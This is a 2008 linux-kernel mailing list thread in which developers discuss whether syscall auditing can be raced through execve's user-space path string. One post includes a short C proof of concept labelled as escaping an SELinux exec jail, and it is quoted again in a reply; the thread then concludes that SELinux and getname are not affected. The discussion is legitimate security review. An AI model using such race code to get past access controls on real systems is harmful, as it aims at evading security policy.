System call audit - Kernel

This is a discussion on System call audit - Kernel ; Hi David, As I am looking into the system-wide system call tracing problem, I start to wonder how auditsc deals with the fact that user-space could concurrently change the content referred to by the __user pointers. This would be the ...

+ Reply to Thread
Results 1 to 8 of 8

Thread: System call audit

  1. System call audit

    Hi David,

    As I am looking into the system-wide system call tracing problem, I
    start to wonder how auditsc deals with the fact that user-space could
    concurrently change the content referred to by the __user pointers.

    This would be the case for execve. If we create a program with two
    thread; one is executing execve syscalls and the other thread would be
    modifying the userspace string containing the name of the program to
    execute. Since we have two copy_from_user, one in auditsc and one in the
    real execve() function, the string passed to the OS could differ from
    the string seen by auditsc.

    Regards,

    Mathieu


    --
    Mathieu Desnoyers
    OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
    --
    To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
    the body of a message to majordomo@vger.kernel.org
    More majordomo info at http://vger.kernel.org/majordomo-info.html
    Please read the FAQ at http://www.tux.org/lkml/

  2. Re: System call audit

    On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > Hi David,
    >
    > As I am looking into the system-wide system call tracing problem, I
    > start to wonder how auditsc deals with the fact that user-space could
    > concurrently change the content referred to by the __user pointers.


    In general we have to copy the content into kernel space, audit it, and
    then act on it from there. See the explanation on the IPC audit patch at
    http://lwn.net/Articles/125350/ for example.

    Auditing one thing and then acting on another would be simply broken.

    > This would be the case for execve. If we create a program with two
    > thread; one is executing execve syscalls and the other thread would be
    > modifying the userspace string containing the name of the program to
    > execute.


    I was going to suggest that that attack vector won't work, because
    execve() kills all threads. But all you have to do to avoid that is put
    the data in question into a shared writable mmap and modify it from
    another _process_. And in fact I suspect there's a combination of CLONE_
    flags which would avoid the thread-killing behaviour anyway.

    > Since we have two copy_from_user, one in auditsc and one in the
    > real execve() function, the string passed to the OS could differ from
    > the string seen by auditsc.


    Right. Don't Do That Then. The audit code should see what's _actually_
    given to the child process. The audit/execve code has changed since I
    last looked, but I think it's probably OK because it's reading the
    contents of the new program's mm on the way back from the execve()
    system call -- before ever giving the CPU back to that process.

    --
    dwmw2

    --
    To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
    the body of a message to majordomo@vger.kernel.org
    More majordomo info at http://vger.kernel.org/majordomo-info.html
    Please read the FAQ at http://www.tux.org/lkml/

  3. Re: System call audit

    * David Woodhouse (dwmw2@infradead.org) wrote:
    > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > Hi David,
    > >
    > > As I am looking into the system-wide system call tracing problem, I
    > > start to wonder how auditsc deals with the fact that user-space could
    > > concurrently change the content referred to by the __user pointers.

    >
    > In general we have to copy the content into kernel space, audit it, and
    > then act on it from there. See the explanation on the IPC audit patch at
    > http://lwn.net/Articles/125350/ for example.
    >
    > Auditing one thing and then acting on another would be simply broken.
    >
    > > This would be the case for execve. If we create a program with two
    > > thread; one is executing execve syscalls and the other thread would be
    > > modifying the userspace string containing the name of the program to
    > > execute.

    >
    > I was going to suggest that that attack vector won't work, because
    > execve() kills all threads. But all you have to do to avoid that is put
    > the data in question into a shared writable mmap and modify it from
    > another _process_. And in fact I suspect there's a combination of CLONE_
    > flags which would avoid the thread-killing behaviour anyway.
    >


    Even better : if execve fails, it doesn't kill the threads. Therefore,
    all we have to do is to busy-loop doing failing execve() calls and
    atomically change the string to what we want to be executed. Can anyone
    test the sample snippet in a context where executing /bin/bash is
    disallowed on a SMP system ? I don't have a selinux setup handy. I
    suppose that as soon as selinux would see one /bin/bash exec, it will
    kill the process, so a few runs would be required in order to generate
    the correct race.


    /*
    * Escaping selinux exec jail
    *
    * build with gcc -lpthread -o escape-selinux escape-selinux.c
    *
    * Mathieu Desnoyers
    * License: GPL
    */

    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    static char modstring[] = "$bin/bash";

    void *thr1(void *arg)
    {
    while(1) {
    execl(modstring, NULL);
    }
    return ((void*)1);

    }

    void *thr2(void *arg)
    {
    while(1) {
    modstring[0] = '$';
    modstring[0] = '/';
    }
    return ((void*)2);
    }

    int main()
    {
    int err;
    pthread_t tid1, tid2;
    void *tret;

    err = pthread_create(&tid1, NULL, thr1, NULL);
    if (err != 0)
    exit(1);

    err = pthread_create(&tid2, NULL, thr2, NULL);
    if (err != 0)
    exit(1);

    sleep(10);

    err = pthread_join(tid1, &tret);
    if (err != 0)
    exit(1);

    err = pthread_join(tid2, &tret);
    if (err != 0)
    exit(1);

    return 0;
    }


    > > Since we have two copy_from_user, one in auditsc and one in the
    > > real execve() function, the string passed to the OS could differ from
    > > the string seen by auditsc.

    >
    > Right. Don't Do That Then. The audit code should see what's _actually_
    > given to the child process. The audit/execve code has changed since I
    > last looked, but I think it's probably OK because it's reading the
    > contents of the new program's mm on the way back from the execve()
    > system call -- before ever giving the CPU back to that process.
    >
    > --
    > dwmw2
    >


    --
    Mathieu Desnoyers
    OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
    --
    To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
    the body of a message to majordomo@vger.kernel.org
    More majordomo info at http://vger.kernel.org/majordomo-info.html
    Please read the FAQ at http://www.tux.org/lkml/

  4. Re: System call audit

    On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
    > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > > Hi David,
    > > >
    > > > As I am looking into the system-wide system call tracing problem, I
    > > > start to wonder how auditsc deals with the fact that user-space could
    > > > concurrently change the content referred to by the __user pointers.

    > >
    > > In general we have to copy the content into kernel space, audit it, and
    > > then act on it from there. See the explanation on the IPC audit patch at
    > > http://lwn.net/Articles/125350/ for example.
    > >
    > > Auditing one thing and then acting on another would be simply broken.
    > >
    > > > This would be the case for execve. If we create a program with two
    > > > thread; one is executing execve syscalls and the other thread would be
    > > > modifying the userspace string containing the name of the program to
    > > > execute.

    > >
    > > I was going to suggest that that attack vector won't work, because
    > > execve() kills all threads. But all you have to do to avoid that is put
    > > the data in question into a shared writable mmap and modify it from
    > > another _process_. And in fact I suspect there's a combination of CLONE_
    > > flags which would avoid the thread-killing behaviour anyway.
    > >

    >
    > Even better : if execve fails, it doesn't kill the threads. Therefore,
    > all we have to do is to busy-loop doing failing execve() calls and
    > atomically change the string to what we want to be executed. Can anyone
    > test the sample snippet in a context where executing /bin/bash is
    > disallowed on a SMP system ? I don't have a selinux setup handy.


    You were talking about audit earlier. Now you seem to be talking about
    selinux.

    --
    dwmw2

    --
    To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
    the body of a message to majordomo@vger.kernel.org
    More majordomo info at http://vger.kernel.org/majordomo-info.html
    Please read the FAQ at http://www.tux.org/lkml/

  5. Re: System call audit


    On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
    > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > > Hi David,
    > > >
    > > > As I am looking into the system-wide system call tracing problem, I
    > > > start to wonder how auditsc deals with the fact that user-space could
    > > > concurrently change the content referred to by the __user pointers.

    > >
    > > In general we have to copy the content into kernel space, audit it, and
    > > then act on it from there. See the explanation on the IPC audit patch at
    > > http://lwn.net/Articles/125350/ for example.
    > >
    > > Auditing one thing and then acting on another would be simply broken.
    > >
    > > > This would be the case for execve. If we create a program with two
    > > > thread; one is executing execve syscalls and the other thread would be
    > > > modifying the userspace string containing the name of the program to
    > > > execute.

    > >
    > > I was going to suggest that that attack vector won't work, because
    > > execve() kills all threads. But all you have to do to avoid that is put
    > > the data in question into a shared writable mmap and modify it from
    > > another _process_. And in fact I suspect there's a combination of CLONE_
    > > flags which would avoid the thread-killing behaviour anyway.
    > >

    >
    > Even better : if execve fails, it doesn't kill the threads. Therefore,
    > all we have to do is to busy-loop doing failing execve() calls and
    > atomically change the string to what we want to be executed. Can anyone
    > test the sample snippet in a context where executing /bin/bash is
    > disallowed on a SMP system ? I don't have a selinux setup handy. I
    > suppose that as soon as selinux would see one /bin/bash exec, it will
    > kill the process, so a few runs would be required in order to generate
    > the correct race.


    SELinux doesn't base any of its decisions on pathname strings provided
    by the user (or pathnames at all, for that matter; SELinux is
    attribute/label-based).

    >
    > /*
    > * Escaping selinux exec jail
    > *
    > * build with gcc -lpthread -o escape-selinux escape-selinux.c
    > *
    > * Mathieu Desnoyers
    > * License: GPL
    > */
    >
    > #include
    > #include
    > #include
    > #include
    > #include
    > #include
    > #include
    > #include
    >
    > static char modstring[] = "$bin/bash";
    >
    > void *thr1(void *arg)
    > {
    > while(1) {
    > execl(modstring, NULL);
    > }
    > return ((void*)1);
    >
    > }
    >
    > void *thr2(void *arg)
    > {
    > while(1) {
    > modstring[0] = '$';
    > modstring[0] = '/';
    > }
    > return ((void*)2);
    > }
    >
    > int main()
    > {
    > int err;
    > pthread_t tid1, tid2;
    > void *tret;
    >
    > err = pthread_create(&tid1, NULL, thr1, NULL);
    > if (err != 0)
    > exit(1);
    >
    > err = pthread_create(&tid2, NULL, thr2, NULL);
    > if (err != 0)
    > exit(1);
    >
    > sleep(10);
    >
    > err = pthread_join(tid1, &tret);
    > if (err != 0)
    > exit(1);
    >
    > err = pthread_join(tid2, &tret);
    > if (err != 0)
    > exit(1);
    >
    > return 0;
    > }
    >
    >
    > > > Since we have two copy_from_user, one in auditsc and one in the
    > > > real execve() function, the string passed to the OS could differ from
    > > > the string seen by auditsc.

    > >
    > > Right. Don't Do That Then. The audit code should see what's _actually_
    > > given to the child process. The audit/execve code has changed since I
    > > last looked, but I think it's probably OK because it's reading the
    > > contents of the new program's mm on the way back from the execve()
    > > system call -- before ever giving the CPU back to that process.
    > >
    > > --
    > > dwmw2
    > >

    >

    --
    Stephen Smalley
    National Security Agency

    --
    To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
    the body of a message to majordomo@vger.kernel.org
    More majordomo info at http://vger.kernel.org/majordomo-info.html
    Please read the FAQ at http://www.tux.org/lkml/

  6. Re: System call audit

    * David Woodhouse (dwmw2@infradead.org) wrote:
    > On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
    > > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > > > Hi David,
    > > > >
    > > > > As I am looking into the system-wide system call tracing problem, I
    > > > > start to wonder how auditsc deals with the fact that user-space could
    > > > > concurrently change the content referred to by the __user pointers.
    > > >
    > > > In general we have to copy the content into kernel space, audit it, and
    > > > then act on it from there. See the explanation on the IPC audit patch at
    > > > http://lwn.net/Articles/125350/ for example.
    > > >
    > > > Auditing one thing and then acting on another would be simply broken.
    > > >
    > > > > This would be the case for execve. If we create a program with two
    > > > > thread; one is executing execve syscalls and the other thread would be
    > > > > modifying the userspace string containing the name of the program to
    > > > > execute.
    > > >
    > > > I was going to suggest that that attack vector won't work, because
    > > > execve() kills all threads. But all you have to do to avoid that is put
    > > > the data in question into a shared writable mmap and modify it from
    > > > another _process_. And in fact I suspect there's a combination of CLONE_
    > > > flags which would avoid the thread-killing behaviour anyway.
    > > >

    > >
    > > Even better : if execve fails, it doesn't kill the threads. Therefore,
    > > all we have to do is to busy-loop doing failing execve() calls and
    > > atomically change the string to what we want to be executed. Can anyone
    > > test the sample snippet in a context where executing /bin/bash is
    > > disallowed on a SMP system ? I don't have a selinux setup handy.

    >
    > You were talking about audit earlier. Now you seem to be talking about
    > selinux.
    >


    I thought selinux did hook into syscall audit ? (sorry, I am new to the
    kernel auditing field) The race I refer to is in the auditsc.c kernel
    code, so syscall audit would be the one I am talking about. I refer to
    selinux here just because, as of my understanding, it happens to be one
    module-based callback which can hook on syscall audit.

    Mathieu

    --
    Mathieu Desnoyers
    OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
    --
    To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
    the body of a message to majordomo@vger.kernel.org
    More majordomo info at http://vger.kernel.org/majordomo-info.html
    Please read the FAQ at http://www.tux.org/lkml/

  7. Re: System call audit


    On Tue, 2008-05-13 at 09:12 -0400, Mathieu Desnoyers wrote:
    > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
    > > > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > > > > Hi David,
    > > > > >
    > > > > > As I am looking into the system-wide system call tracing problem, I
    > > > > > start to wonder how auditsc deals with the fact that user-space could
    > > > > > concurrently change the content referred to by the __user pointers.
    > > > >
    > > > > In general we have to copy the content into kernel space, audit it, and
    > > > > then act on it from there. See the explanation on the IPC audit patch at
    > > > > http://lwn.net/Articles/125350/ for example.
    > > > >
    > > > > Auditing one thing and then acting on another would be simply broken.
    > > > >
    > > > > > This would be the case for execve. If we create a program with two
    > > > > > thread; one is executing execve syscalls and the other thread would be
    > > > > > modifying the userspace string containing the name of the program to
    > > > > > execute.
    > > > >
    > > > > I was going to suggest that that attack vector won't work, because
    > > > > execve() kills all threads. But all you have to do to avoid that is put
    > > > > the data in question into a shared writable mmap and modify it from
    > > > > another _process_. And in fact I suspect there's a combination of CLONE_
    > > > > flags which would avoid the thread-killing behaviour anyway.
    > > > >
    > > >
    > > > Even better : if execve fails, it doesn't kill the threads. Therefore,
    > > > all we have to do is to busy-loop doing failing execve() calls and
    > > > atomically change the string to what we want to be executed. Can anyone
    > > > test the sample snippet in a context where executing /bin/bash is
    > > > disallowed on a SMP system ? I don't have a selinux setup handy.

    > >
    > > You were talking about audit earlier. Now you seem to be talking about
    > > selinux.
    > >

    >
    > I thought selinux did hook into syscall audit ? (sorry, I am new to the
    > kernel auditing field) The race I refer to is in the auditsc.c kernel
    > code, so syscall audit would be the one I am talking about. I refer to
    > selinux here just because, as of my understanding, it happens to be one
    > module-based callback which can hook on syscall audit.


    SELinux is a user of the audit subsystem in terms of generating audit
    messages for permission denials. It doesn't rely on any inputs from the
    audit subsystem.

    --
    Stephen Smalley
    National Security Agency

    --
    To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
    the body of a message to majordomo@vger.kernel.org
    More majordomo info at http://vger.kernel.org/majordomo-info.html
    Please read the FAQ at http://www.tux.org/lkml/

  8. Re: System call audit

    * David Woodhouse (dwmw2@infradead.org) wrote:
    > On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
    > > * David Woodhouse (dwmw2@infradead.org) wrote:
    > > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
    > > > > Hi David,
    > > > >
    > > > > As I am looking into the system-wide system call tracing problem, I
    > > > > start to wonder how auditsc deals with the fact that user-space could
    > > > > concurrently change the content referred to by the __user pointers.
    > > >
    > > > In general we have to copy the content into kernel space, audit it, and
    > > > then act on it from there. See the explanation on the IPC audit patch at
    > > > http://lwn.net/Articles/125350/ for example.
    > > >
    > > > Auditing one thing and then acting on another would be simply broken.
    > > >
    > > > > This would be the case for execve. If we create a program with two
    > > > > thread; one is executing execve syscalls and the other thread would be
    > > > > modifying the userspace string containing the name of the program to
    > > > > execute.
    > > >
    > > > I was going to suggest that that attack vector won't work, because
    > > > execve() kills all threads. But all you have to do to avoid that is put
    > > > the data in question into a shared writable mmap and modify it from
    > > > another _process_. And in fact I suspect there's a combination of CLONE_
    > > > flags which would avoid the thread-killing behaviour anyway.
    > > >

    > >
    > > Even better : if execve fails, it doesn't kill the threads. Therefore,
    > > all we have to do is to busy-loop doing failing execve() calls and
    > > atomically change the string to what we want to be executed. Can anyone
    > > test the sample snippet in a context where executing /bin/bash is
    > > disallowed on a SMP system ? I don't have a selinux setup handy.

    >
    > You were talking about audit earlier. Now you seem to be talking about
    > selinux.
    >


    Actually, getname/putname seems to make sure the name is only copied
    once per audit context. So it should be ok.

    Mathieu

    --
    Mathieu Desnoyers
    OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F BA06 3F25 A8FE 3BAE 9A68
    --
    To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
    the body of a message to majordomo@vger.kernel.org
    More majordomo info at http://vger.kernel.org/majordomo-info.html
    Please read the FAQ at http://www.tux.org/lkml/

+ Reply to Thread